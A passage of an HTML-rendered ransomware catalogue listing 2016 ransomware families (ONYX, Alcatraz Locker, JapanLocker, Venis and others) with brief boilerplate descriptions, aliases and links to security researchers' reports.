<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/jackpot-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/jackpot-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/791639214152617985">https://twitter.com/struppigel/status/791639214152617985</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28-2016-locky-angry-duck-and-more/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28-2016-locky-angry-duck-and-more/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_onyx_ransomeware"><a class="anchor" href="#_onyx_ransomeware"></a><a class="link" href="#_onyx_ransomeware">ONYX Ransomeware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Georgian ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1865. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/onyx-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/onyx-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/791557636164558848">https://twitter.com/struppigel/status/791557636164558848</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28-2016-locky-angry-duck-and-more/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28-2016-locky-angry-duck-and-more/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ifn643_ransomware"><a class="anchor" href="#_ifn643_ransomware"></a><a class="link" href="#_ifn643_ransomware">IFN643 Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1866. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/ifn643-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/ifn643-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/791576159960072192">https://twitter.com/struppigel/status/791576159960072192</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28-2016-locky-angry-duck-and-more/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28-2016-locky-angry-duck-and-more/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_alcatraz_locker_ransomware"><a class="anchor" href="#_alcatraz_locker_ransomware"></a><a class="link" href="#_alcatraz_locker_ransomware">Alcatraz Locker Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1867. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/alcatraz-locker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/alcatraz-locker-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/PolarToffee/status/792796055020642304">https://twitter.com/PolarToffee/status/792796055020642304</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_esmeralda_ransomware"><a class="anchor" href="#_esmeralda_ransomware"></a><a class="link" href="#_esmeralda_ransomware">Esmeralda Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1868. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/esmeralda-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/esmeralda-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/630835/esmeralda-ransomware/">https://www.bleepingcomputer.com/forums/t/630835/esmeralda-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_encryptile_ransomware"><a class="anchor" href="#_encryptile_ransomware"></a><a class="link" href="#_encryptile_ransomware">EncrypTile Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1869. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/encryptile-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/encryptile-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fileice_ransomware_survey_ransomware"><a class="anchor" href="#_fileice_ransomware_survey_ransomware"></a><a class="link" href="#_fileice_ransomware_survey_ransomware">Fileice Ransomware Survey Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Sample of how the hacker tricks the user using the survey method. <a href="https://1.bp.blogspot.com/-72ECd1vsUdE/WBMSzPQEgzI/AAAAAAAABzA/i8V-Kg8Gstcn_7-YZK__PDC2VgafWcfDgCLcB/s1600/survey-screen.png" class="bare">https://1.bp.blogspot.com/-72ECd1vsUdE/WBMSzPQEgzI/AAAAAAAABzA/i8V-Kg8Gstcn_7-YZK__PDC2VgafWcfDgCLcB/s1600/survey-screen.png</a> The hacker definatly has a sense of humor: <a href="https://1.bp.blogspot.com/-2AlvtcvdyUY/WBMVptG_V5I/AAAAAAAABzc/1KvAMeDmY2w9BN9vkqZO8LWkBu7T9mvDACLcB/s1600/ThxForYurTyme.JPG" class="bare">https://1.bp.blogspot.com/-2AlvtcvdyUY/WBMVptG_V5I/AAAAAAAABzc/1KvAMeDmY2w9BN9vkqZO8LWkBu7T9mvDACLcB/s1600/ThxForYurTyme.JPG</a></p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1870. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/fileice-ransomware-survey.html">https://id-ransomware.blogspot.co.il/2016/10/fileice-ransomware-survey.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/">https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptowire_ransomeware"><a class="anchor" href="#_cryptowire_ransomeware"></a><a class="link" href="#_cryptowire_ransomeware">CryptoWire Ransomeware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1871. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/cryptowire-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/cryptowire-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/791554654664552448">https://twitter.com/struppigel/status/791554654664552448</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/">https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hucky_ransomware"><a class="anchor" href="#_hucky_ransomware"></a><a class="link" href="#_hucky_ransomware">Hucky Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on Locky</p>
</div>
<div class="paragraph">
<p>Hucky Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Hungarian Locky Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1872. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/hucky-ransomware-hungarian-locky.html">https://id-ransomware.blogspot.co.il/2016/10/hucky-ransomware-hungarian-locky.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.avast.com/hucky-ransomware-a-hungarian-locky-wannabe">https://blog.avast.com/hucky-ransomware-a-hungarian-locky-wannabe</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/846241982347427840">https://twitter.com/struppigel/status/846241982347427840</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_winnix_cryptor_ransomware"><a class="anchor" href="#_winnix_cryptor_ransomware"></a><a class="link" href="#_winnix_cryptor_ransomware">Winnix Cryptor Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1873. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/winnix-cryptor-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/winnix-cryptor-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/PolarToffee/status/811940037638111232">https://twitter.com/PolarToffee/status/811940037638111232</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_angryduck_ransomware"><a class="anchor" href="#_angryduck_ransomware"></a><a class="link" href="#_angryduck_ransomware">AngryDuck Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Demands 10 BTC</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1874. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/angryduck-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/angryduck-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335/status/790334746488365057">https://twitter.com/demonslay335/status/790334746488365057</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lock93_ransomware"><a class="anchor" href="#_lock93_ransomware"></a><a class="link" href="#_lock93_ransomware">Lock93 Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1875. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/lock93-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/lock93-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/789882488365678592">https://twitter.com/malwrhunterteam/status/789882488365678592</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_asn1_encoder_ransomware"><a class="anchor" href="#_asn1_encoder_ransomware"></a><a class="link" href="#_asn1_encoder_ransomware">ASN1 Encoder Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1876. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/asn1-encoder-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/asn1-encoder-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://malwarebreakdown.com/2017/03/02/rig-ek-at-92-53-105-43-drops-asn1-ransomware/">https://malwarebreakdown.com/2017/03/02/rig-ek-at-92-53-105-43-drops-asn1-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_click_me_ransomware"><a class="anchor" href="#_click_me_ransomware"></a><a class="link" href="#_click_me_ransomware">Click Me Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. The hacker tries to get the user to play a game and when the user clicks the button, there is no game, just 20 pictures in a .gif below: <a href="https://3.bp.blogspot.com/-1zgO3-bBazs/WAkPYqXuayI/AAAAAAAABxI/DO3vycRW-TozneSfRTdeKyXGNEtJSMehgCLcB/s1600/all-images.gif" class="bare">https://3.bp.blogspot.com/-1zgO3-bBazs/WAkPYqXuayI/AAAAAAAABxI/DO3vycRW-TozneSfRTdeKyXGNEtJSMehgCLcB/s1600/all-images.gif</a></p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1877. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/click-me-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/click-me-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.youtube.com/watch?v=Xe30kV4ip8w">https://www.youtube.com/watch?v=Xe30kV4ip8w</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_airacrop_ransomware"><a class="anchor" href="#_airacrop_ransomware"></a><a class="link" href="#_airacrop_ransomware">AiraCrop Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1878. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/airacrop-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/airacrop-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_japanlocker_ransomware"><a class="anchor" href="#_japanlocker_ransomware"></a><a class="link" href="#_japanlocker_ransomware">JapanLocker Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Base64 encoding, ROT13, and top-bottom swapping</p>
</div>
<div class="paragraph">
<p>JapanLocker Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SHC Ransomware</p>
</li>
<li>
<p>SHCLocker</p>
</li>
<li>
<p>SyNcryption</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1879. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/japanlocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/japanlocker-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cyber.nj.gov/threat-profiles/ransomware-variants/japanlocker">https://www.cyber.nj.gov/threat-profiles/ransomware-variants/japanlocker</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/fortiguard-lion/schRansomwareDecryptor/blob/master/schRansomwarev1_decryptor.php">https://github.com/fortiguard-lion/schRansomwareDecryptor/blob/master/schRansomwarev1_decryptor.php</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fortinet.com/2016/10/19/japanlocker-an-excavation-to-its-indonesian-roots">https://blog.fortinet.com/2016/10/19/japanlocker-an-excavation-to-its-indonesian-roots</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_anubis_ransomware"><a class="anchor" href="#_anubis_ransomware"></a><a class="link" href="#_anubis_ransomware">Anubis Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. EDA2</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1880. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/anubis-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/anubis-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://nyxbone.com/malware/Anubis.html">http://nyxbone.com/malware/Anubis.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xtplocker_5_0_ransomware"><a class="anchor" href="#_xtplocker_5_0_ransomware"></a><a class="link" href="#_xtplocker_5_0_ransomware">XTPLocker 5.0 Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1881. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/xtplocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/xtplocker-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exotic_ransomware"><a class="anchor" href="#_exotic_ransomware"></a><a class="link" href="#_exotic_ransomware">Exotic Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Also encrypts executables</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1882. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/eviltwins-exotic-ransomware-targets-executable-files/">https://www.bleepingcomputer.com/news/security/eviltwins-exotic-ransomware-targets-executable-files/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14-2016-exotic-lockydump-comrade-and-more/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14-2016-exotic-lockydump-comrade-and-more/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cyber.nj.gov/threat-profiles/ransomware-variants/exotic-ransomware">https://www.cyber.nj.gov/threat-profiles/ransomware-variants/exotic-ransomware</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/exotic-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/exotic-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt_ransomware_v_2"><a class="anchor" href="#_apt_ransomware_v_2"></a><a class="link" href="#_apt_ransomware_v_2">APT Ransomware v.2</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. NO POINT TO PAY THE RANSOM, THE FILES ARE COMPLETELY DESTROYED</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1883. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/apt-ransomware-2.html">https://id-ransomware.blogspot.co.il/2016/10/apt-ransomware-2.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_windows_security_ransonware"><a class="anchor" href="#_windows_security_ransonware"></a><a class="link" href="#_windows_security_ransonware">Windows_Security Ransonware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>Windows_Security Ransonware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>WS Go Ransonware</p>
</li>
<li>
<p>Trojan.Encoder.6491</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1884. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/ws-go-ransonware.html">https://id-ransomware.blogspot.co.il/2016/10/ws-go-ransonware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cyber.nj.gov/threat-profiles/ransomware-variants/apt-ransomware-v2">https://www.cyber.nj.gov/threat-profiles/ransomware-variants/apt-ransomware-v2</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ncrypt_ransomware"><a class="anchor" href="#_ncrypt_ransomware"></a><a class="link" href="#_ncrypt_ransomware">NCrypt Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1885. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/ncrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/ncrypt-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_venis_ransomware"><a class="anchor" href="#_venis_ransomware"></a><a class="link" href="#_venis_ransomware">Venis Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. In <a href="mailto:devVenisRansom@protonmail.com">devVenisRansom@protonmail.com</a></p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1886. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/venis-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/venis-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/Antelox/status/785849412635521024">https://twitter.com/Antelox/status/785849412635521024</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://pastebin.com/HuK99Xmj">http://pastebin.com/HuK99Xmj</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
